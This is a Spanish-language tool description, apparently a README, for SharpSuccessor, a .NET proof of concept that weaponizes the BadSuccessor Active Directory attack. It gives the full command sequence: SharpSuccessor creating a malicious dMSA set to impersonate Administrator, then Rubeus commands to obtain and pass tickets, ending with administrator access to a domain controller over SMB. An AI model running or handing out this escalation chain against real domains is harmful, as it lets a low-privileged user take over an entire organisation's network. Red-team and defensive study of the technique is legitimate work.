
SharpSuccessor es un Prueba de Concepto (POC) en .NET para armar completamente el ataque BadSuccessor de Yuval Gordon (@YuG0rd) de Akamai.
SharpSuccessor es una prueba de concepto (POC) en .NET para weaponizar por completo el ataque BadSuccessor de Yuval Gordon (@YuG0rd) de Akamai. Un usuario con privilegios bajos que tenga permisos CreateChild sobre cualquier unidad organizativa (OU) del dominio de Active Directory, junto con acceso de escritura sobre un objeto objetivo, puede realizar una toma de control de la cuenta.
Usa SharpSuccessor para añadir y weaponizar el objeto dMSA, así como para escribir los atributos adecuados en la cuenta objetivo que deseas suplantar:
SharpSuccessor.exe add /impersonate:Administrator /path:"ou=test,dc=lab,dc=lan" /account:jdoe /name:attacker_dMSA

Solicita un TGT en el contexto del usuario actual, en este caso jdoe:
Rubeus.exe tgtdeleg /nowrap

Luego usa ese TGT para suplantar la cuenta dMSA:
Rubeus.exe asktgs /targetuser:attacker_dmsa$ /service:krbtgt/lab.lan /opsec /dmsa /nowrap /ptt /ticket:doIFTDCCB.....

Ahora puedes solicitar un ticket de servicio con contexto de Administrador para cualquier SPN, incluidos los controladores de dominio para la post-explotación. Por ejemplo, aquí mostraré los privilegios de administrador para SMB en el controlador de dominio:
Rubeus.exe asktgs /user:attacker_dmsa$ /service:cifs/WIN-RAEAN26UGJ5.lab.lan /opsec /dmsa /nowrap /ptt /ticket:doIF2DCCBdS...

Ahora que tenemos el ticket en memoria, podemos probar el acceso:

Un enorme agradecimiento a Jim Sykora y a Garrett Foster por las inspiraciones y la asistencia para esta herramienta.